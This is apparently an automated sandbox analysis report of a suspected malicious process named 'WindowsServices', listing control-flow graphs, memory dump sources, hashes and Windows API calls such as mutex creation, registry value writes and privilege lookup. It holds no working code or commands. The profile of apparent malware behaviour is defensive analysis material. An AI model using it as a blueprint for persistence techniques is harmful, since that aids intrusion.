                                                                                          • String ID:
                                                                                          • API String ID: 2874748243-0
                                                                                          • Opcode ID: 8ae562a236a269a5678609663950bc8505437248793c34056ac4bc196ebaf846
                                                                                          • Instruction ID: b1c901b38a5277d9992f0342cda3659ab34f7abebb5669228c387eaa998b49b6
                                                                                          • Opcode Fuzzy Hash: 8ae562a236a269a5678609663950bc8505437248793c34056ac4bc196ebaf846
                                                                                          • Instruction Fuzzy Hash: 0E11C6729007009FDB20CF15D844B96FBE4EF04320F08C4AAED858B655D335E518DF62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtQuerySystemInformation.NTDLL ref: 00CBAA81
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationQuerySystem
                                                                                          • String ID:
                                                                                          • API String ID: 3562636166-0
                                                                                          • Opcode ID: 5be03a6b76f1105f984b26429e9321a76660f62db60f4b30cc30f3f84d0f3c48
                                                                                          • Instruction ID: aed5b48b6a754f59ef001eaed5b6a9d928e6dc20243fea313a9fd8a940095f15
                                                                                          • Opcode Fuzzy Hash: 5be03a6b76f1105f984b26429e9321a76660f62db60f4b30cc30f3f84d0f3c48
                                                                                          • Instruction Fuzzy Hash: 6D018F368006009FDB208F16D944BA1FBE4EF19720F08C09AED891B651D375E418EF72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 4e70278-4e702a6 1 4e702ae-4e702bc 0->1 2 4e702a8 0->2 3 4e702c2-4e70305 1->3 4 4e703d8-4e703ec 1->4 66 4e702a8 call 4e70c10 2->66 67 4e702a8 call 4e70c3b 2->67 68 4e702a8 call 4e70c1b 2->68 22 4e703b9-4e703d2 3->22 7 4e70475-4e704c8 4->7 8 4e703f2-4e7046b 4->8 20 4e704cf-4e704e9 7->20 21 4e704ca 7->21 8->7 25 4e70520-4e70677 20->25 26 4e704eb-4e70515 20->26 21->20 22->4 24 4e7030a-4e70316 22->24 27 4e70bbd 24->27 28 4e7031c-4e7034d 24->28 59 4e706ff-4e70bb8 25->59 60 4e7067d-4e706bb 25->60 26->25 30 4e70bc2-4e70c05 27->30 37 4e70390-4e703b3 28->37 38 4e7034f-4e70385 28->38 37->22 37->30 38->37 60->59 66->1 67->1 68->1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2l$2l$a
                                                                                          • API String ID: 0-1664682057
                                                                                          • Opcode ID: e1d6a1423430ef64ddb61d61d170ceeae9849d4c4b154321818304c8b5d91bcf
                                                                                          • Instruction ID: c12877491600051e983642b3a0ace2ad58d7b3b88a3eff88c4a81a8ad4566059
                                                                                          • Opcode Fuzzy Hash: e1d6a1423430ef64ddb61d61d170ceeae9849d4c4b154321818304c8b5d91bcf
                                                                                          • Instruction Fuzzy Hash: 96B16C70A01218CFDB14EF75D854BEDB7B2AF85304F1084A9D409AB3A5DB35AE8ACF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 69 4e70268-4e7026d 70 4e70277-4e702a6 69->70 71 4e702ae-4e702bc 70->71 72 4e702a8 70->72 73 4e702c2-4e70305 71->73 74 4e703d8-4e703ec 71->74 136 4e702a8 call 4e70c10 72->136 137 4e702a8 call 4e70c3b 72->137 138 4e702a8 call 4e70c1b 72->138 92 4e703b9-4e703d2 73->92 77 4e70475-4e704aa 74->77 78 4e703f2-4e7046b 74->78 87 4e704b5-4e704c8 77->87 78->77 90 4e704cf-4e704e9 87->90 91 4e704ca 87->91 95 4e70520-4e70677 90->95 96 4e704eb-4e70515 90->96 91->90 92->74 94 4e7030a-4e70316 92->94 97 4e70bbd 94->97 98 4e7031c-4e7034d 94->98 129 4e706ff-4e70bb8 95->129 130 4e7067d-4e706bb 95->130 96->95 100 4e70bc2-4e70c05 97->100 107 4e70390-4e703b3 98->107 108 4e7034f-4e70385 98->108 107->92 107->100 108->107 130->129 136->71 137->71 138->71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2l$2l$a
                                                                                          • API String ID: 0-1664682057
                                                                                          • Opcode ID: 04d611488b52f31efcc5efe0c0be8e0786a3c7d4e01c2ed53a01d10f0aec2dbf
                                                                                          • Instruction ID: 1ef2b1e483cd8fc74c781bed57758ad1fc3637fc0394c4ae0f26fa0b20d4581d
                                                                                          • Opcode Fuzzy Hash: 04d611488b52f31efcc5efe0c0be8e0786a3c7d4e01c2ed53a01d10f0aec2dbf
                                                                                          • Instruction Fuzzy Hash: 5B817D70A01218CFDB24EF75D855BEDB7B1AF84304F1084AAD409A73A5DB359E89CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 139 4e70392-4e703ad 143 4e703af-4e703b3 139->143 144 4e70bc2-4e70c05 143->144 145 4e703b9-4e703d2 143->145 146 4e7030a-4e70316 145->146 147 4e703d8-4e703ec 145->147 148 4e70bbd 146->148 149 4e7031c-4e7034d 146->149 154 4e70475-4e704aa 147->154 155 4e703f2-4e7046b 147->155 148->144 160 4e70390 149->160 161 4e7034f-4e70385 149->161 166 4e704b5-4e704c8 154->166 155->154 160->143 161->160 169 4e704cf-4e704e9 166->169 170 4e704ca 166->170 173 4e70520-4e70677 169->173 174 4e704eb-4e70515 169->174 170->169 193 4e706ff-4e70bb8 173->193 194 4e7067d-4e706bb 173->194 174->173 194->193
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2l$2l$a
                                                                                          • API String ID: 0-1664682057
                                                                                          • Opcode ID: ecfe5a1382cb2416f3f886aa3207900776cc02c21e783834568887fafde7d3cb
                                                                                          • Instruction ID: 2ce32e159197cfad0f6695cc6f7295fbe0d335855b9886c2f43f4edd579ec5fb
                                                                                          • Opcode Fuzzy Hash: ecfe5a1382cb2416f3f886aa3207900776cc02c21e783834568887fafde7d3cb
                                                                                          • Instruction Fuzzy Hash: 11617E70A01219CFDB14EF75D951BECB7B2AF84308F1084A9D409AB3A1DB35AE85DF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 200 4e70429-4e704aa 210 4e704b5-4e704c8 200->210 211 4e704cf-4e704e9 210->211 212 4e704ca 210->212 214 4e70520-4e70677 211->214 215 4e704eb-4e70515 211->215 212->211 234 4e706ff-4e70bb8 214->234 235 4e7067d-4e706bb 214->235 215->214 235->234
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2l$2l$a
                                                                                          • API String ID: 0-1664682057
                                                                                          • Opcode ID: b63a637a9fbfae831aa2d74e583afcaa24bd98739bd23e32beb9f810a025decb
                                                                                          • Instruction ID: a60bb092dffe18d38d94f7b3c84dc879f2656abd3552ce10c14dc43a295e42ed
                                                                                          • Opcode Fuzzy Hash: b63a637a9fbfae831aa2d74e583afcaa24bd98739bd23e32beb9f810a025decb
                                                                                          • Instruction Fuzzy Hash: C8515D70A01219CFDB24EF74D851BECB7B1AF85304F5084AAD409AB391DB35AE89DF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 241 cbab92-cbac15 245 cbac1a-cbac23 241->245 246 cbac17 241->246 247 cbac28-cbac31 245->247 248 cbac25 245->248 246->245 249 cbac33-cbac57 CreateMutexW 247->249 250 cbac82-cbac87 247->250 248->247 253 cbac89-cbac8e 249->253 254 cbac59-cbac7f 249->254 250->249 253->254
                                                                                          APIs
                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 00CBAC39
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMutex
                                                                                          • String ID:
                                                                                          • API String ID: 1964310414-0
                                                                                          • Opcode ID: 8aa49a11cf9da9daa51d74a7b0c73a3f9209d98a37de7b2a150642b6edb1f4df
                                                                                          • Instruction ID: a3946c18193b3d15003bd5166b37264d267aeef6034add75a98f683945781862
                                                                                          • Opcode Fuzzy Hash: 8aa49a11cf9da9daa51d74a7b0c73a3f9209d98a37de7b2a150642b6edb1f4df
                                                                                          • Instruction Fuzzy Hash: 87319171509380AFE711CF65DD45B96BFF8EF06314F08849AE984CB292D375E909CB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 257 cba361-cba3cf 260 cba3d1 257->260 261 cba3d4-cba3dd 257->261 260->261 262 cba3df 261->262 263 cba3e2-cba3e8 261->263 262->263 264 cba3ea 263->264 265 cba3ed-cba404 263->265 264->265 267 cba43b-cba440 265->267 268 cba406-cba419 RegQueryValueExW 265->268 267->268 269 cba41b-cba438 268->269 270 cba442-cba447 268->270 270->269
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA40C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: 76314a986f013e1a0fbea793d869bc09d76e459a630ec1dbf42b44fbcdf52ba8
                                                                                          • Instruction ID: 54551f7d1ba13775a805a62ce5f72722f0fb5c6595ebc5e5d7825393be560b31
                                                                                          • Opcode Fuzzy Hash: 76314a986f013e1a0fbea793d869bc09d76e459a630ec1dbf42b44fbcdf52ba8
                                                                                          • Instruction Fuzzy Hash: 3B317375505780AFE722CF11CC84F92BBF8EF06710F08849AE985DB292D364E949CB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 274 cba462-cba4c3 277 cba4c8-cba4d4 274->277 278 cba4c5 274->278 279 cba4d9-cba4f0 277->279 280 cba4d6 277->280 278->277 282 cba4f2-cba505 RegSetValueExW 279->282 283 cba527-cba52c 279->283 280->279 284 cba52e-cba533 282->284 285 cba507-cba524 282->285 283->282 284->285
                                                                                          APIs
                                                                                          • RegSetValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA4F8
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: 6373a60fae5a26419d7ee967dc8dfd401891f25b8e29e1a9a2cd2d6dab475a15
                                                                                          • Instruction ID: 9062487d06fcb4a0b9fe88e43ff5c6c26bf22981d683e00420b3060139249599
                                                                                          • Opcode Fuzzy Hash: 6373a60fae5a26419d7ee967dc8dfd401891f25b8e29e1a9a2cd2d6dab475a15
                                                                                          • Instruction Fuzzy Hash: F2216076504780AFD7228F11DC44FA7BFBCEF46610F08849AE985DB652D264E948CB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 315 cbabc6-cbac15 318 cbac1a-cbac23 315->318 319 cbac17 315->319 320 cbac28-cbac31 318->320 321 cbac25 318->321 319->318 322 cbac33-cbac3b CreateMutexW 320->322 323 cbac82-cbac87 320->323 321->320 324 cbac41-cbac57 322->324 323->322 326 cbac89-cbac8e 324->326 327 cbac59-cbac7f 324->327 326->327
                                                                                          APIs
                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 00CBAC39
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMutex
                                                                                          • String ID:
                                                                                          • API String ID: 1964310414-0
                                                                                          • Opcode ID: 4cfe62fe4c27a26cec0822722edf851cb1cb4a7e08de5af685c71cfebf41068d
                                                                                          • Instruction ID: 4e848ecbf5f8df2899b58bad666065b2ee4a9319073606e8adc1f77c450cd30a
                                                                                          • Opcode Fuzzy Hash: 4cfe62fe4c27a26cec0822722edf851cb1cb4a7e08de5af685c71cfebf41068d
                                                                                          • Instruction Fuzzy Hash: 0A2192716002409FE710DF66DD45BA6FBE8EF05324F14C469E9889B741D375E908CA76
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 302 cba67b-cba6d5 304 cba6da-cba6e0 302->304 305 cba6d7 302->305 306 cba6e2 304->306 307 cba6e5-cba6ee 304->307 305->304 306->307 308 cba731-cba736 307->308 309 cba6f0-cba6f8 LookupPrivilegeValueW 307->309 308->309 310 cba6fe-cba710 309->310 312 cba738-cba73d 310->312 313 cba712-cba72e 310->313 312->313
                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00CBA6F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 99a7f92bc1f7b3f272638f99ca51a04504810ea6ba70d14be37977cb458204a0
                                                                                          • Instruction ID: 2a8c2ddc7b6a67b045e8e8c1cec9026ca49cea19884c44c221988cfce2d44fbf
                                                                                          • Opcode Fuzzy Hash: 99a7f92bc1f7b3f272638f99ca51a04504810ea6ba70d14be37977cb458204a0
                                                                                          • Instruction Fuzzy Hash: E421B3B15083805FD7118B25DC45B92BFF8AF06310F0984DAE884CB263D224D909C762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 330 cba392-cba3cf 332 cba3d1 330->332 333 cba3d4-cba3dd 330->333 332->333 334 cba3df 333->334 335 cba3e2-cba3e8 333->335 334->335 336 cba3ea 335->336 337 cba3ed-cba404 335->337 336->337 339 cba43b-cba440 337->339 340 cba406-cba419 RegQueryValueExW 337->340 339->340 341 cba41b-cba438 340->341 342 cba442-cba447 340->342 342->341
                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA40C
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          • Opcode ID: bf35c9536fc14503b35b9353142ce7dc463289c512ac7ab11855df6c4bd8881b
                                                                                          • Instruction ID: 6f489dc8c7f4b4c760cc4775365d4aa59ab934d695234ecbcb4cea6195222cb8
                                                                                          • Opcode Fuzzy Hash: bf35c9536fc14503b35b9353142ce7dc463289c512ac7ab11855df6c4bd8881b
                                                                                          • Instruction Fuzzy Hash: 95219076600604AFE720CF16DC84FA6F7ECEF04720F18C46AE9859B651D7A4E949CA72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 346 cba960-cba9c4 348 cbaa07-cbaa0c 346->348 349 cba9c6-cba9ce FindCloseChangeNotification 346->349 348->349 350 cba9d4-cba9e6 349->350 352 cba9e8-cbaa04 350->352 353 cbaa0e-cbaa13 350->353 353->352
                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00CBA9CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: 044ace6d355d965ba105d4e5bfa1a5e7b26761afb1a1a2736f41c6ba4dd33b8d
                                                                                          • Instruction ID: 4fd87cdd3f32e0bb64b203e03ae484ff8d0fdc5f338bd4485b2864203b69ee90
                                                                                          • Opcode Fuzzy Hash: 044ace6d355d965ba105d4e5bfa1a5e7b26761afb1a1a2736f41c6ba4dd33b8d
                                                                                          • Instruction Fuzzy Hash: 2921AE725093C05FDB128B25DC54A92BFB8AF47324F0984DAE8858F663D264A908DB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 355 cba486-cba4c3 357 cba4c8-cba4d4 355->357 358 cba4c5 355->358 359 cba4d9-cba4f0 357->359 360 cba4d6 357->360 358->357 362 cba4f2-cba505 RegSetValueExW 359->362 363 cba527-cba52c 359->363 360->359 364 cba52e-cba533 362->364 365 cba507-cba524 362->365 363->362 364->365
                                                                                          APIs
                                                                                          • RegSetValueExW.KERNELBASE(?,00000E24,8A7A8376,00000000,00000000,00000000,00000000), ref: 00CBA4F8
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: c85e63d53a34ed7f34da7e275d39b0958942446d412edbfc6262ed8f66432034
                                                                                          • Instruction ID: 942e2b57179a8d25b15070d08c0d55c3bc210042923df6bd8beeda96b9dbbb08
                                                                                          • Opcode Fuzzy Hash: c85e63d53a34ed7f34da7e275d39b0958942446d412edbfc6262ed8f66432034
                                                                                          • Instruction Fuzzy Hash: 71118E76500600AFEB318F12DC45FA6FBECEF14724F18C45AED859A651D364E948CAB2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 377 cba6ae-cba6d5 378 cba6da-cba6e0 377->378 379 cba6d7 377->379 380 cba6e2 378->380 381 cba6e5-cba6ee 378->381 379->378 380->381 382 cba731-cba736 381->382 383 cba6f0-cba6f8 LookupPrivilegeValueW 381->383 382->383 384 cba6fe-cba710 383->384 386 cba738-cba73d 384->386 387 cba712-cba72e 384->387 386->387
                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00CBA6F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: d742d12e1f9d8715e869507f4b6d9d7b9adc81e9631c7951806c692fefdc3d26
                                                                                          • Instruction ID: 01e1d867537aa58d0a9e4f03124e92daf4836415a9fab4b9e43f8eb2c03af9d4
                                                                                          • Opcode Fuzzy Hash: d742d12e1f9d8715e869507f4b6d9d7b9adc81e9631c7951806c692fefdc3d26
                                                                                          • Instruction Fuzzy Hash: 1011CC71A042009FDB50CF15D845796FBE8EF14320F18C4AAED45DB745D774E944CA72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00CBA9CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1802106426.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_cba000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseFindNotification
                                                                                          • String ID:
                                                                                          • API String ID: 2591292051-0
                                                                                          • Opcode ID: 15ea63eb1f1b3566ede2479cca805a6f1299eb600cafceb3934a7be74cbff8e5
                                                                                          • Instruction ID: e1474296c41a4a117f299d4a620c64e7e1d2ee81e15fe6f4dcfd5ff4362228c0
                                                                                          • Opcode Fuzzy Hash: 15ea63eb1f1b3566ede2479cca805a6f1299eb600cafceb3934a7be74cbff8e5
                                                                                          • Instruction Fuzzy Hash: 0401D4719006408FDB60CF16D984796FBE8DF15320F18C0AADD499B646D274E508DE72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d3e6be0fd81d6a8bd70363b5fc564cb225d4d3ea710b85209f62f8572589cd87
                                                                                          • Instruction ID: e26770282fd9e7c92d976a137360733aed4e95156ec8aab7c11c7742562f7181
                                                                                          • Opcode Fuzzy Hash: d3e6be0fd81d6a8bd70363b5fc564cb225d4d3ea710b85209f62f8572589cd87
                                                                                          • Instruction Fuzzy Hash: 3F4135701156428FC704FF39E985689B7B2FFA5248745C829D804DB26EEB34AD4ECB92
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1803218210.0000000000F10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_f10000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8c0525a0d7ee9a88ce153616afd6b8cfb82e3e2b053009e81b1f48a70461e5d8
                                                                                          • Instruction ID: 3abd65974994402767fc66f82fd9e10c004ca513d84fba071af4226601c8277d
                                                                                          • Opcode Fuzzy Hash: 8c0525a0d7ee9a88ce153616afd6b8cfb82e3e2b053009e81b1f48a70461e5d8
                                                                                          • Instruction Fuzzy Hash: F811DB7540D7C05FC3138B21AC55852BFB8EF4722070984DFE849CB653D229A848CBB6
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 50c6c7e7841c6602398aa1b0e58368c26dccd40a493aa3931866b1327affea72
                                                                                          • Instruction ID: 59b45409c991872109e2a5e07a7d8051f2d856fe5f3b3cd40217c83de6c4fce9
                                                                                          • Opcode Fuzzy Hash: 50c6c7e7841c6602398aa1b0e58368c26dccd40a493aa3931866b1327affea72
                                                                                          • Instruction Fuzzy Hash: 2501059698F7C2AFD31342745CA51943FB0ADA312474E01D7C881CB0A3E20D5A5FD762
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 17f4bb1b66cde38bc0ef70980d5f93413d7299bd6d700056cadb8e114439d382
                                                                                          • Instruction ID: faac6cd4866c25435bdfe4c14680b282b26f6bf11f137f84dd5b59cb1a542eda
                                                                                          • Opcode Fuzzy Hash: 17f4bb1b66cde38bc0ef70980d5f93413d7299bd6d700056cadb8e114439d382
                                                                                          • Instruction Fuzzy Hash: 13014231A093800FC3127378A8154AD3B629FA22357094AAFD4509B3E7CE789C8AC756
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_4e70000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe6f2bba48cf44221e0a4a0428a94669ccf813d07997aa1c63b628ebfabd91f7
                                                                                          • Instruction ID: 1c70b21ae0263db26d22adb0419cd09554d7b60ab80ffc1e5e6125e2c529ccba
                                                                                          • Opcode Fuzzy Hash: fe6f2bba48cf44221e0a4a0428a94669ccf813d07997aa1c63b628ebfabd91f7
                                                                                          • Instruction Fuzzy Hash: 2F012131B093804FC3117338A8554AE3B629BA222170949AEE8419B3E7DF799C4AC792
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1803218210.0000000000F10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_f10000_WindowsServices.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f2b2f5ffebb89a41c34e589da543a446bcfe1097d339f087fda05cf076b7bf0e
                                                                                          • Instruction ID: d11512c1dcb91d27a300f459e6b5aacbf940cd570b5c0fb37b00025863aa82f4
                                                                                          • Opcode Fuzzy Hash: f2b2f5ffebb89a41c34e589da543a446bcfe1097d339f087fda05cf076b7bf0e
                                                                                          • Instruction Fuzzy Hash: AD01F9765097806FD712CF16AC44863FFB8EF86630709C49FEC498B612D225B808CB72
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1806965906.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
